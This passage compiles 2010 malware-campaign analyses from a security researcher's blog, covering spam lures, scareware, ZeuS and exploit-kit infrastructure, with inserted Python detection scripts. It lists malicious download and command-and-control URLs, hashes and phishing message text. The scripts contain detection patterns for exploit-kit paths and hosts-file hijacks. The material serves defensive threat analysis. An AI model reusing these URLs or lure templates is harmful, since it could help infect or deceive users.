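# Constructed sample: a normal localhost pair, an ad-blocking line, and
# three hijack lines pointing search engines at a made-up attacker IP.
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.net      # ad-blocking entry, benign
198.51.100.7    www.google.com google.com    # constructed hijack
198.51.100.7    www.bing.com
198.51.100.7    search.yahoo.com
"""

if __name__ == "__main__":
    for lineno, name, ip in find_search_engine_hijacks(SAMPLE_HOSTS):
        print(f"line {lineno}: {name} -> {ip}")
```

On Windows the file lives at %SystemRoot%\System32\drivers\etc\hosts, on Unix-like systems at /etc/hosts.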

The cybercrime-friendly domains in question: 


Internal redirections leading to malicious content take place through the following domains: 


Internal pharmaceutical redirections take place through the 
following domains: 




Internal redirections leading to malicious content take place through the following IPs: 

Sample malicious activity consists of scareware campaigns, client-side exploits, and bogus video players dropping malware. 

Upon visiting the bogus PornTube at vogel-tube.com/xfreeporn.php?id= - 66.197.187.118 (the-real-tube-hest.com and great-celebs-tube.net parked there) - Email: admin@thenweb.com, the user is tricked into manually installing basemultimedia.com/video-plugin.45309.exe - 66.197.154.21 (visualbasismedia.com) - Email: joe@silentringer.com 

- Detection rate: 

[4]video-plugin.45309.exe - Downloader-CEW.b, Result: 6/42 (14.29 %) 

File size: 113152 bytes 

MD5...: 25e644171bf9ee2a052b5fa71f8284e5 

SHA1..: e4ac01534c7c1b71d2a38cf480339d31db187ecb 

Upon execution, the sample phones back to: 


Parked at 216.240.146.119, AS7796 are also: 

Parked at 64.191.44.73, AS21788 are also: 

Parked at 64.20.35.3, AS19318 are also: 

Related malicious domains sharing the same DNS infrastructure: 


Following the bogus dropper, the cybercriminals are also directly serving client-side exploits to users seeking security related content. In this case, the exploits/malware are served from xoxipemej.cn/gr/sl/ - 178.63.170.185 - Email: shiwei_fang77@126.com. 



- Detection rate: 

[5].exe - Rootkit.Agent.AJDR, Result: 20/42 (47.62 %) 

File size: 53760 bytes 

MD5...: 23244c5b5b02fab65b3a7ab51005fd51 

SHA1..: a5f1a10344378f2c8f13c266dce39247ba3bae5f 
Parked on the same IP 178.63.170.185, AS24940 are also: 


Last, but not least, is the scareware infection taking place through www1.warezforyou24.co.cc/?p=p52 - 114.207.244.146; 114.207.244.143; 114.207.244.144; 114.207.244.145. Parked on these IPs is also an extensive portfolio of related scareware domains. 

- Detection rate: 

[6]packupdate107_231.exe - Suspicious: W32/Malware!Gemini, Result: 3/42 (7.15 %) 

File size: 238080 bytes 

MD5...: 93517875c59ac33dab655bc8432b0724 

SHA1..: 774af049406baeef3427b91a2d67ee0250b2b51b 

Upon execution the sample phones back to: 


The cybercrime-friendly domains portfolio is in the process of being suspended. 

This post has been reproduced from [7]Dancho 
Danchev's blog. Follow him [8]on Twitter. 

1. http://www.zdnet.com/blog/security/cybercriminals-promoting-malware-friendly-search-engines/3333 

2. http://ddanchev.blogspot.com/2010/07/exploits-malware-and-scareware-courtesy.html 

3. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html 

4. http://www.virustotal.com/analisis/4e1a45a89acf5751e7dcfa1dcbc9b68de0b44de6988fe2902851ad51cfc93d47-1279197428 

5. http://www.virustotal.com/analisis/0b9618dd8173dd69df8e176e49e1aa01f2c5fe06fcb46980d06dbed6a95eba45-1279197422 

6. http://www.virustotal.com/analisis/1a58543dfd5a5777cae1c29c6f994ad5a1012c2adbah&abe420527f7e12dc4c2-1279197438 

7. http://ddanchev.blogspot.com/ 

8. http://twitter.com/danchodanchev 
Spamvertised Amazon "Verify Your Email", "Your Amazon Order" Malicious Emails (2010-07-16 21:17) 

And they're back (Gumblar, or RUmblar due to the extensive use of .ru domains) for a decent start of the weekend, switching social engineering themes one more time, this time impersonating Amazon.com. 

• NOTE: A summary of the malicious payload served will be posted at a later stage. Meanwhile, in order to facilitate quicker response, a complete list of the participating domains will be featured/disseminated across the appropriate parties. 

- Sample subject: Amazon.com: Please verify your new e-mail address 

- Sample message: "Dear email, You recently changed your e-mail address at Amazon.com. Since you are a subscriber of Amazon.com Delivers E-mail Subscriptions, you will need to verify your new e-mail address. Please verify that the e-mail address email belongs to you. You can click on the link below to complete the verification process. Alternatively, you can type or paste the following link into your Web browser: http://www.amazon.com" 
Client-side exploitation is taking place through, for instance, crystalrobe.ru:8080/index.php?pid=14 and hillchart.com:8080/index.php?pid=14. As seen in previous campaigns, this one also shares an identical directory structure, such as: 

malicious-domain.com:8080/index.php?pid=2 

malicious-domain.com:8080/Notes1.pdf (Notes1-to-Notes10.pdf) 

malicious-domain.com:8080/NewGames.jar 

malicious-domain.com:8080/Games.jar 

malicious-domain.com:8080/Applet1.html (Applet1-to-Applet10.html) 

malicious-domain.com:8080/welcome.php?id=6&pid=1&hello=503 

crystalrobe.ru:8080/index.php?pid=14 

crystalrobe.ru:8080/jquery.jxx?v=5.3.4 

crystalrobe.ru:8080/new/controller.php 

crystalrobe.ru:8080/js.php 

crystalrobe.ru:8080/welcome.php?id=6&pid=1&hello=503 

crystalrobe.ru:8080/welcome.php?id=0&pid=1 
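Because every landing page in this campaign uses the same port and the same handful of file names, the directory structure above is itself a detection signature. The following is an added example, not code from the original post: it scores proxy-log URLs against those paths and reports hosts that served more than one of them; the log format, hostnames and client IPs are constructed.

```python
"""Flag proxy-log requests matching the exploit kit directory layout.

Added example, not code from the original post. It matches the paths the
post documents (index.php?pid=N, NotesN.pdf, AppletN.html, Games.jar /
NewGames.jar, welcome.php?id=..&pid=..&hello=.., jquery.jxx, js.php) on
port 8080 and reports hosts that served more than one of them, which is
the landing-page-then-exploit sequence of a drive-by. The log format and
every hostname and client IP in the sample are constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set
from urllib.parse import urlsplit

# Each pattern is anchored on the path plus query string of the URL.
KIT_PATTERNS = {
    "landing": re.compile(r"^/index\.php\?pid=\d+$"),
    "pdf":     re.compile(r"^/Notes\d{1,2}\.pdf$"),
    "applet":  re.compile(r"^/Applet\d{1,2}\.html$"),
    "jar":     re.compile(r"^/(?:New)?Games\.jar$"),
    "welcome": re.compile(r"^/welcome\.php\?id=\d+&pid=\d+(?:&hello=\d+)?$"),
    "loader":  re.compile(r"^/(?:jquery\.jxx\?v=[\d.]+|new/controller\.php|js\.php)$"),
}
KIT_PORT = 8080

# Constructed log format: "<epoch> <client_ip> <method> <url> <status>"
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d{3})$")


def classify_url(url: str) -> Optional[str]:
    """Return the name of the kit pattern a URL matches, or None."""
    u = urlsplit(url)
    if u.port != KIT_PORT:  # the campaign consistently serves on :8080
        return None
    target = u.path + ("?" + u.query if u.query else "")
    for name, rx in KIT_PATTERNS.items():
        if rx.match(target):
            return name
    return None


def find_kit_hosts(log_lines: List[str]) -> Dict[str, Set[str]]:
    """Map each host that served kit paths to the set of pattern names seen."""
    hits: Dict[str, Set[str]] = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparsable line; skip rather than abort the sweep
        url = m.group(4)
        kind = classify_url(url)
        if kind:
            hits[urlsplit(url).hostname].add(kind)
    return dict(hits)


def high_confidence(hits: Dict[str, Set[str]]) -> List[str]:
    """Hosts that served two or more distinct kit components."""
    return sorted(host for host, kinds in hits.items() if len(kinds) >= 2)


# Constructed sample log: two drive-by sequences, one benign port-80 hit
# and one lone :8080 index.php request (a single hit is weak evidence).
SAMPLE_LOG = [
    "1279300001 10.0.0.12 GET http://kit-a.example:8080/index.php?pid=14 200",
    "1279300002 10.0.0.12 GET http://kit-a.example:8080/Notes3.pdf 200",
    "1279300003 10.0.0.12 GET http://kit-a.example:8080/welcome.php?id=6&pid=1&hello=503 200",
    "1279300010 10.0.0.33 GET http://shop.example/index.php?pid=14 200",
    "1279300011 10.0.0.33 GET http://intranet.example:8080/index.php?pid=2 200",
    "1279300012 10.0.0.41 GET http://kit-b.example:8080/Games.jar 200",
    "1279300013 10.0.0.41 GET http://kit-b.example:8080/Applet7.html 200",
    "this line is not a log record",
]

if __name__ == "__main__":
    hits = find_kit_hosts(SAMPLE_LOG)
    for host in high_confidence(hits):
        print(host, sorted(hits[host]))
```

The hosts in this campaign rotate while the layout stays constant, so keying on the path layout plus the port ages better than a domain blocklist.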

Client-side exploit serving domains (94.23.231.140; 91.121.115.208; 94.23.11.38; 94.23.224.221; 94.23.229.220), part of the campaign: 

Name servers of notice: 

ns1.dnsofthost.com - 81.2.210.98 

ns2.dnsofthost.com - 194.79.88.121 

ns3.dnsofthost.com - 67.223.233.101 

ns4.dnsofthost.com - 85.214.29.9 

Although the NAUNET-REG-RIPN domain registrar has already registered over [1]100 ZeuS crimeware-friendly domains, there's little chance they'll take action. Updates, including takedown/remediation actions, will be posted as soon as they emerge. 

This post has been reproduced from [2]Dancho Danchev's blog. Follow him [3]on Twitter. 

1. https://zeustracker.abuse.ch/monitor.php?registrar=NAUNET-REG-RIPN 

2. http://ddanchev.blogspot.com/ 

3. http://twitter.com/danchodanchev 
Dissecting the Xerox WorkCentre Pro Scanned Document Themed Campaign (2010-07-19 20:26) 

Over the weekend, a "Scan from a Xerox WorkCentre Pro" themed malware campaign relying on zip archives was actively spamvertised by cybercriminals seeking to infect gullible end/corporate users. 

What's particularly interesting about this campaign is the cocktail of malware dropped on infected hosts, including an Asprox sample ([1]Money Mule Recruiters use ASProx's Fast Fluxing Services), and two separate samples of Antimalware Doctor. 

- Sample subject: Scan from a Xerox WorkCentre Pro $9721130 

- Sample message: "Please open the attached document. It was scanned and sent to you using a Xerox WorkCentre Pro. 

Sent by: Guest 
Number of Images: 1 
Attachment File Type: ZIP [DOC] 

WorkCentre Pro Location: machine location not set Device Name: XRX2090AA7ACDB45466972. For more information on Xerox products and solutions, please visit http://www.xerox.com" 

- Detection rates: 

- [2]Xerox_doc1.exe - Trojan.Win32.Jorik.Oficla.bb - Result: 34/42 (80.96 %) 

File size: 30926 bytes 

MD5...: 1d378a6bc94d5b5a702026d31c21e242 

SHA1..: 545e83f547d05664cd6792e254b87539fba24eb9 

- [3]Xerox_doc2.exe - Trojan.Win32.Jorik.Oficla.ba - Result: 34/42 (80.96 %) 

File size: 43520 bytes 

MD5...: 829c86d4962f186109534b669ade47d7 

SHA1..: 5d3d02d0f6ce87cd96a34b73dc395460d623616e 

The samples then phone back to the Oficla/Sasfis C&Cs at hulejsoops.ru/images/bb.php?v=200&id=554905388&b=avpsales&tm=3 - 91.216.215.66, AS51274 - Email: mxx3@yandex.ru, which periodically rotates three different executables using the following URLs: 

0815.ch/pic/view.exe 

curseri.ch/pictures/securedupdaterfix717.exe 

regionalprodukte-beo.ch/about/cgi.exe 

Backup URLs: 

leeitpobbod.ru/image/bb.php - 59.53.91.195, AS4134 - Email: mxx3@yandex.ru - dead response 

ioioohuiidifsd.ru/image/bb.php - 68.168.222.158 - Email: mxx3@yandex.ru - dead response 

nemohuildifsd.ru/image/bb.php - 59.53.91.195 (nemohuildiin.ru, russianmomds.ru), AS4134 - Email: mxx3@yandex.ru - dead response 

Let's take a peek at the samples found within the C&C. 


[4]view.exe - Trojan.Win32.Jorik.Aspxor.e - Result: 11/42 (26.2 %) 

File size: 79360 bytes 

MD5...: 5d296fe1ef7bf67f36fe9adb209398ee 

SHA1..: 41b45bcd241cd97b72d7866d13c4a0eb6bf6a0ee 
Upon execution, the sample phones back to well known Asprox C&Cs: 

[5]cl63amgstart.ru:80/board.php - 91.213.217.4, AS42473 - Email: ssal@yandex.ru 

[6]hypervmsys.ru:80/board.php - 89.149.223.232 (hostagents.ru), AS28753 - Email: vadim.rinatovich@yandex.ru 
Previously, all of the following ASProx domains, used exclusively for massive SQL injections, used to respond to 91.213.217.4: 




Currently, the gang is migrating this infrastructure to 109.196.134.58, AS39150, VLTELECOM-AS VLineTelecom LLC, Moscow, Russia. 
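The pivot applied by hand throughout these posts, listing what else is parked on the same IP or registered to the same e-mail, can be automated. The following is an added example, not code from the original post: a union-find over (domain, IP, registrant e-mail) records that links every domain sharing an IP or e-mail with a known-bad seed, transitively; all records in it are constructed, not indicators from the post.

```python
"""Cluster domains by shared hosting IP and registrant e-mail.

Added example, not code from the original post. It automates the pivot
the post applies by hand ("parked on the same IP ... are also", same
registrant e-mail): a union-find over (domain, ip, email) records joins
every domain that shares an IP or an e-mail with a known-bad seed,
transitively. All records below are constructed, not indicators from
the post.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, NamedTuple, Optional, Set


class Record(NamedTuple):
    domain: str
    ip: Optional[str]      # None when no resolution was available
    email: Optional[str]   # None when WHOIS gave no registrant e-mail


class UnionFind:
    def __init__(self) -> None:
        self.parent: Dict[str, str] = {}

    def find(self, x: str) -> str:
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]  # path halving
            x = self.parent[x]
        return x

    def union(self, a: str, b: str) -> None:
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def cluster_infrastructure(records: Iterable[Record]) -> List[Set[str]]:
    """Group domains that share an IP or registrant e-mail, transitively."""
    uf = UnionFind()
    for r in records:
        uf.find(r.domain)  # register the domain even if it has no pivots
        # Pivot nodes carry a prefix so an IP or e-mail can never collide
        # with a domain name; e-mails are case-folded before comparison.
        if r.ip:
            uf.union(r.domain, "ip:" + r.ip)
        if r.email:
            uf.union(r.domain, "mail:" + r.email.lower())
    groups: Dict[str, Set[str]] = defaultdict(set)
    for node in uf.parent:
        if ":" not in node:  # only domain nodes are cluster members
            groups[uf.find(node)].add(node)
    # Largest cluster first; ties broken by the alphabetically first member.
    return sorted(groups.values(), key=lambda g: (-len(g), min(g)))


def expand_from_seeds(records: Iterable[Record], seeds: Iterable[str]) -> Set[str]:
    """Every domain reachable from the seed set through shared IP/e-mail."""
    seed_set = set(seeds)
    reachable: Set[str] = set()
    for group in cluster_infrastructure(records):
        if group & seed_set:
            reachable |= group
    return reachable


# Constructed records (documentation-range IPs, invented names).
SAMPLE_RECORDS = [
    Record("dropper-a.example",  "203.0.113.10", "reg1@mail.example"),
    Record("dropper-b.example",  "203.0.113.10", None),                 # shares IP only
    Record("decoy-shop.example", "203.0.113.44", "reg1@mail.example"),  # shares e-mail only
    Record("phone-home.example", "203.0.113.44", "REG1@mail.example"),  # e-mail differs in case
    Record("unrelated.example",  "198.51.100.5", "someone@else.example"),
    Record("orphan.example",     None,           None),
]

if __name__ == "__main__":
    for group in cluster_infrastructure(SAMPLE_RECORDS):
        print(sorted(group))
    print(sorted(expand_from_seeds(SAMPLE_RECORDS, ["dropper-a.example"])))
```

Shared-hosting IPs, parking providers and registrar privacy-proxy e-mails will join unrelated domains, so in practice those pivot values go on an exclusion list before clustering.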

All of these domains and subdomains share the same js.js directory structure, which upon visiting loads URLs such as accesspad.ru:8080/index.php?pid=6, with the rest of the domains sharing the same infrastructure as the ones profiled in the "[7]Spamvertised Amazon "Verify Your Email", "Your Amazon Order" Malicious Emails" post: 
Getting back to the samples rotated by the original campaign binary, and their detection rates and network interactions. 

- Detection rates: 

- [8]securedupdaterfix717.exe - Trojan.Win32.FakeYak - Result: 22/42 (52.39 %) 

File size: 36864 bytes 

MD5...: cd16d4c998537248e6d4d0a3d51ca6de 

SHA1..: 7e36ef0ce85fac18ecffd5a82566352ce0322589 
Phones back to: 

s.ldwn.in/inst.php?fff=7071710000&saf=ru - 91.188.60.236 (updget.in; wordmeat.in), [9]AS6851 - Email: feliciachappell@ymail.com 

bootfree.in/MainModule717release10000.exe - 194.8.250.207 (flowload.in; iessown.in; sstats.in), AS43134 - Email: feliciachappell@ymail.com 

s.wordmeat.in/install.php?coid= - 91.188.60.236, [10]AS6851 - Email: feliciachappell@ymail.com 
- Detection rate for MainModule717release10000.exe: 

- [11]MainModule717release10000.exe - Trojan:Win32/FakeYak - Result: 26/42 (61.90 %) 

File size: 1043968 bytes 

MD5...: 3c30c62e9981bd86c5897447cb358235 

SHA1..: 36bfc285a61bcb67f2867dd303ac3cefa0e490a0 

Phones back to: 

wordmeat.in - 91.188.60.236 - Email: feliciachappell@ymail.com 

vismake.in - 91.188.60.236 - Email: keelingelizabeth@ymail.com 

- Detection rate for the 3rd binary rotated in the original C&C: 

- [12]cgi.exe - Trojan.Inject.8960 - Result: 6/42 (14.29 %) 

File size: 62976 bytes 

MD5...: 45c062490e0fc262c181efc323cb83ba 

SHA1..: bff90630f2064d7bcc82b7389c2b8525ff960870 

Phones back to: 

musiceng.ru/music/forum/index1.php - 91.212.127.40, AS49087 - Email: oifeodosoff@yandex.ru 

The whole campaign is a great example of what cybercrime underground multitasking is all about. Moreover, it illustrates the interactions between the usual suspects, with the not so surprising appearance of the already profiled [13]AS6851, BKCNET, Sagade Ltd. 

This post has been reproduced from [14]Dancho 
Danchev's blog. Follow him [15]on Twitter. 

1. http://ddanchev.blogspot.com/2008/07/money-mule-recruiters-use-asproxs-fast.html 

2. http://www.virustotal.com/analisis/a77ed99ab4c50782c33e84f1ecddS11d5e1b4b943669a942bef3d5bd99e42673-1279559650 

3. http://www.virustotal.com/analisis/078c437295f0248d36c452297a23939f6cba73e8a89faada9fc2b6f97a1f0bd8-1279559651 

4. http://www.virustotal.com/analisis/88130889be1fc3ab01ed7b154b99cf7dd47fbbcef30e51de7a9d92ba5c8d50b6-1279560134 

5. http://www.m86security.com/labs/i/The-Asprox-Spambot-Resurrects.trace.1345%7E.asp 

6. http://www.m86security.com/labs/i/Another-round-of-Asprox-SQL-injection-attacks.trace.1366%7E.asp 

7. http://ddanchev.blogspot.com/2010/07/spamvertised-amazon-verify-you-email.html 

8. http://www.virustotal.com/analisis/63d9da362e466e962c7abc9f8b3d643daf1e!8f84170cd22bfbd4a595877b18b-1279560218 

9. http://ddanchev.blogspot.com/2010/07/sampling-malicious-activity-inside.html 

10. http://ddanchev.blogspot.com/2010/07/sampling-malicious-activity-inside.html 

11. http://www.virustotal.com/analisis/bb82340898097338cc4ddff6b8c0283fc416fae4e2726390a65fc65ccde7dc76-12795 

12. http://www.virustotal.com/analisis/1cf85f064d3e042a1ce0f7726d818e3145f6c5dec893a8e7807cdb2361667caf-1279560723 

13. http://ddanchev.blogspot.com/2010/07/exploits-malware-and-scareware-courtesy.html 

14. http://ddanchev.blogspot.com/ 

15. http://twitter.com/danchodanchev 
ZeuS Crimeware Serving 123Greetings Ecard Themed Campaign in the Wild (2010-07-20 23:40) 

Ubiquitous social engineering schemes never fade away. ZeuS crimeware campaigners are currently using a 123greetings.com ecard-themed campaign, in an attempt to entice users to "enjoy their ecard". 

Subject: "You have received an Greeting eCard" 

Message: "Good day. You have received an eCard 

To pick up your eCard, choose from any of the following options: Click on the following link (or copy & paste it into your web browser): matt-levine.com/ecard.exe; secondary URL offered: forestarabians.nl/ecard.exe 

Your card will be aviailable for pick-up beginning for the next 30 days. Please be sure to view your eCard before the days are up! 

We hope you enjoy you eCard. Thank You!" 

Detection rate: 

- [1]ecard.exe - Cryp_Zbot-12; Trojan/Win32.Vundo - Result: 9/42 (21.43 %) 

File size: 147968 bytes 

MD5...: e6f3aa226bf9733b7e8c07cab339f4dc 

SHA1..: e983767931900a13b88a615d6c1d3f6ff8fb6b60 

Upon execution, the sample phones back to: 

[2]zephehooqu.ru/bin/koethood.bin - 77.78.240.115, AS42560 - Email: skit@5mx.ru 

[3]jocudaidie.ru/9xq/gate.php - 118.169.173.218, AS3462 - Email: skit@5mx.ru - FAST-FLUXED 

Multiple MD5s are also currently active at zephehooqu.ru. 

Detection rates: 


Related .ru cybercrime-friendly domains share fast-flux infrastructure with this campaign's C&C.

Name servers of note within the fast-flux infrastructure include ns1.tropic-nolk.com - 188.40.204.158 - Email: greysy@gmx.com, and it gets even more interesting.

[14]greysy@gmx.com has already been profiled in an Avalanche botnet campaign that used [15]TROYAK-AS's services back then ([16]The Avalanche Botnet and the TROYAK-AS Connection), followed by another assessment, "[17]TorrentReactor.net Serving Crimeware, Client-Side Exploits Through a Malicious Ad", where the same email was also used to register a name server that is part of the fast-flux infrastructure of the ZeuS crimeware's C&Cs.

This post has been reproduced from [18]Dancho 
Danchev's blog. Follow him [19]on Twitter. 

1. http://www.virustotal.com/analisis/6fa6220a2ede4f8b700025d7e3c566d5fac0ce0309bb99a3d62c2348fc4b211d-1279634229

2. https://zeustracker.abuse.ch/monitor.php?host=zephehooqu.ru

3. https://zeustracker.abuse.ch/monitor.php?host=jocudaidie.ru

4. http://www.virustotal.com/analisis/077ad77f77e4e2987633a0c78f8a54e664e9ecaacfa37128c0631326182c571f-1279635278

5. http://www.virustotal.com/analisis/652eeb7dfbb26f203e9a46481604ea4e44c1b12793313b232bce45a6a41f2e78-1279635282

6. http://www.virustotal.com/analisis/7537dc104a87606ad7c97a61c0e2df51ab718ed058975039fa691f9dac528b9c-1279635287

7. http://www.virustotal.com/analisis/4cad09c241308174a674c2a48ef25bf062b9344e55b2742a8b2ef3dba2e1a4cd-1279635293

8. http://www.virustotal.com/analisis/54e80ed3761e03e618502d6a167221b14f62c26762a63c99514186fc7f499f81-1279635298

9. http://www.virustotal.com/analisis/d78516adb99d08970ba67d5396f0a1027dc6f0eedd1c0eae0412404b076e5234-1279635315

10. http://www.virustotal.com/analisis/09df053716f8a262332d361eb590cad8f350ec58a60b3cffd33e76c8bc647a3b-1279635326

11. http://www.virustotal.com/analisis/cfa160f6f4d763daf400c03d1b994bccca2d26c8c4c8ea5717113d935fe59382-1279635329

12. http://www.virustotal.com/analisis/5f732cf733a052d2bba3a360e7a7994bb3ccdd76aa036b5f6777ab78164d0037-1279635336

13. http://www.virustotal.com/analisis/0da6ba3b7154f9fbbbcb4ea0771c63262a5e4e0a15c69de7d9706ece7621b289-1279635343

14. http://ddanchev.blogspot.com/2010/02/irsphotoarchive-themed-zeusclient-side.html

15. http://www.zdnet.com/blog/security/troyak-as-the-cybercrime-friendly-isp-that-just-wont-go-away/5761

16. http://ddanchev.blogspot.com/2010/05/avalanche-botnet-and-troyak-as.html

17. http://ddanchev.blogspot.com/2010/05/torrentreactornet-serving-crimeware.html

18. http://ddanchev.blogspot.com/

19. http://twitter.com/danchodanchev
Summarizing Zero Day's Posts for July (2010-08-02 14:54)

The following is a brief summary of all of my posts at [1]ZDNet's Zero Day for July, 2010. You [2]can also go through [3]previous summaries, as well as subscribe to my [4]personal RSS feed, [5]Zero Day's main feed, or follow me on Twitter:

Recommended reading:

• [6]Does Microsoft's sharing of source code with China and Russia pose a security risk?

• [7]Middle East countries: the BlackBerry is a national security threat

• [8]Report: Apple had the most vulnerabilities throughout 2005-2010

01. [9]Image Gallery: June's cyber threat landscape

02. [10]The Pirate Bay hacked through multiple SQL injections

03. [11]Does Microsoft's sharing of source code with China and Russia pose a security risk?

04. [12]Report: Apple had the most vulnerabilities throughout 2005-2010

05. [13]Malware Watch: Malicious Amazon themed emails in the wild

06. [14]RSA: Banking trojan uses social network as command and control server

07. [15]Middle East countries: the BlackBerry is a national security threat

08. [16]Image Gallery: Avast! Antivirus office in Prague, Czech Republic

09. [17]Image Gallery: Introduction to Avast! Antivirus version 5.1

10. [18]Image Gallery: The (European) Antivirus market - current trends

11. [19]Google tops comparative review of malicious search results

This post has been reproduced from [20]Dancho Danchev's blog. Follow him [21]on Twitter.

1. http://blogs.zdnet.com/security

2. http://ddanchev.blogspot.com/2010/07/summarizing-zero-days-posts-for-june.html

3. http://ddanchev.blogspot.com/2010/05/summarizing-zero-days-posts-for-may.html

4. http://www.zdnet.com/topics/dancho+danchev?o=1&mode=rss&tag=mantle_skin:content

5. http://feeds.feedburner.com/zdnet/security

6. http://www.zdnet.com/blog/security/does-microsofts-sharing-of-source-code-with-china-and-russia-pose-a-security-risk/6789

7. http://www.zdnet.com/blog/security/middle-east-countries-the-blackberry-is-a-national-security-threat/6942

8. http://www.zdnet.com/blog/security/report-apple-had-the-most-vulnerabilities-throughout-2005-2010/6801

9. http://www.zdnet.com/photos/image-gallery-junes-cyber-threat-landscape/441675

10. http://www.zdnet.com/blog/security/the-pirate-bay-hacked-through-multiple-sql-injections/6776

11. http://www.zdnet.com/blog/security/does-microsofts-sharing-of-source-code-with-china-and-russia-pose-a-security-risk/6789

12. http://www.zdnet.com/blog/security/report-apple-had-the-most-vulnerabilities-throughout-2005-2010/6801

13. http://www.zdnet.com/blog/security/malware-watch-malicious-amazon-themed-emails-in-the-wild/6863

14. http://www.zdnet.com/blog/security/rsa-banking-trojan-uses-social-network-as-command-and-control-server/6

15. http://www.zdnet.com/blog/security/middle-east-countries-the-blackberry-is-a-national-security-threat/6942

16. http://www.zdnet.com/photos/image-gallery-avast-antivirus-office-in-prague-czech-republic/450633

17. http://www.zdnet.com/photos/image-gallery-introduction-to-avast-antivirus-version-51/450981

18. http://www.zdnet.com/photos/image-gallery-the-european-antivirus-market-current-trends/451006

19. http://www.zdnet.com/blog/security/google-tops-comparative-review-of-malicious-search-results/7009

20. http://ddanchev.blogspot.com/

21. http://twitter.com/danchodanchev
Spamvertised Best Buy, Macy's, Evite and Target Themed Scareware/Exploits Serving Campaign (2010-08-09 14:19)

They are back again ([1]Spamvertised Amazon "Verify Your Email", "Your Amazon Order" Malicious Emails; [2]Dissecting the Xerox WorkCentre Pro Scanned Document Themed Campaign) for a fresh start of the week, with a currently ongoing spam campaign serving scareware and client-side exploits, using "Thank you for your payment"/"Thank you for your EXPRESS payment" themed subjects and impersonating popular brands such as Best Buy, Macy's, Target and Evite.

Let's dissect the campaign and its structure, emphasize the monetization strategy, and expose the complete portfolio of domains involved in the campaign.

Sample email:

"Subject: Thank you for your payment Don't miss a thing - Add support@e.macys.com to your email address book!

Click here if you are unable to see images in this email.

1. Sign in on macys.com at https://www.macys.com/myinfo/index.ognc

2. Click on "My Account" - "My Profile" at https://www.macys.com/myinfo/profile/index.ognc

3. Uncheck the box Receive email notification when statements are available to view online and when payments are due.

4. Click on "Update Profile"

5. Expect the change to take place in 3 days

©2009 macys.com Inc., 685 Market Street, Suite 800, San Francisco, CA 94105. All rights reserved."

Compared to previous campaigns, the directory structure of this one (fast-fluxed :8080/index.php?pid=10; maliciousurl.ru/QWERTY.js; maliciousurl.ru/ODBC.js; LAN.js; Access.js; End User.js etc.) remains virtually the same, depending, of course, on the angle you choose for dissecting it.
Sample campaign structure:

- musicsgeneva.com /x.html - "PLEASE WAITING 4 SECOND..."

- opus22.org /x.html - "PLEASE WAITING 4 SECOND..."

- shamelessfreegift.com /x.html - "PLEASE WAITING 4 SECOND..."

- physicianschoiceonline.com /x.htm - "PLEASE WAITING 4 SECOND..."

- baymediagroup .com:8080/index.php?pid=10 - client-side exploits - 188.165.95.133; 188.165.192.106; 91.121.108.61; 94.23.60.106; 178.32.5.233 - Email: fb@bigmailbox.ru

- hoopdotami.cz .cc/scanner5/?afid=24 - 188.72.192.229 - scareware monetization

- Detection rate:

antivirus_24.exe - [3]Trojan.Win32.FraudPack.berq - Result: 16/42 (38.1 %)
File size: 166912 bytes
MD5...: b3cd297c654d3be52ffeb5f6a5ff13b4
SHA1..: bae889dd8ac7b22ec5f5649d6e0c073c8e2119d5
Upon execution, the sample phones back to:

httpsstarss.in /httpss/v=40&step=2&hostid= - 188.72.226.154 - Email: stevieksbaiz@hotmail.com

httpstatsconfig.com /getfile.php?r= - 204.12.226.173 - Email: httpstatsconfig.com@evoprivacy.com

Several other domains, along with their name servers, also respond to 204.12.226.173.


Further domains use the same name server, ns1.freedomen.info - 209.85.99.32 - Email: mail@vetaxa.com.
Name servers of note, and the client-side exploit serving domains that are part of the campaign, were also identified.

UPDATED: Thursday, August 12, 2010: Historical OSINT on the client-side exploit serving domains that were part of Gumblar's campaigns for April/May 2010 and used the hostdnssite.com (Email: cop@qx8.ru) name server was also compiled.


UPDATED: Friday, August 13, 2010: 

The use of Yahoo Groups is still ongoing. Sample URL: groups.yahoo .com/group/nfidcsyi/message, which includes a link to perfectpillcool .com:8080.

The campaign is ongoing, updates will be posted as soon as 
new developments emerge. 

This post has been reproduced from [4]Dancho 
Danchev's blog. Follow him [5]on Twitter. 
1. http://ddanchev.blogspot.com/2010/07/spamvertised-amazon-verify-you-email.html

2. http://ddanchev.blogspot.com/2010/07/dissecting-xerox-workcentre-pro-scanned.html

3. http://www.virustotal.com/analisis/912608f55fba98cb03a13114ceea4a503d0fd4cc6ca5bab345792b577884311f-1281345777

4. http://ddanchev.blogspot.com/

5. http://twitter.com/danchodanchev
Dissecting a Scareware-Serving Black Hat SEO Campaign Using Compromised .NL/.CH Sites (2010-08-13 17:09)

Over the past week, I've been tracking - among the countless number of campaigns currently in the process of getting profiled/taken care of internally - a blackhat SEO campaign that's persistently compromising legitimate sites within small ISPs in the Netherlands and Switzerland for scareware-serving purposes.

Although this beneath-the-radar targeting approach is nothing new, it once again emphasizes a well-proven mentality within the cybercrime ecosystem: collectively, hundreds of thousands of low-profile sites, if well poisoned with bogus/timely/relevant blackhat SEO content, can outpace the hijacked traffic from a high-profile site, because a high-profile site gets cleaned up in a shorter time frame, with community members reacting more quickly based on prioritization due to the importance of the site.

What's particularly interesting about the campaign is the fact that the redirectors/scareware domains were previously parked within our "dear friends" at AS31252, STARNET-AS StarNet Moldova. Go through related posts on STARNET-AS StarNet Moldova:

• [1]Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova

• [2]Dissecting Koobface Gang's Latest Facebook Spreading Campaign

• [3]Koobface Gang Responds to the "10 Things You Didn't Know About the Koobface Gang Post"

• [4]From the Koobface Gang with Scareware Serving Compromised Sites

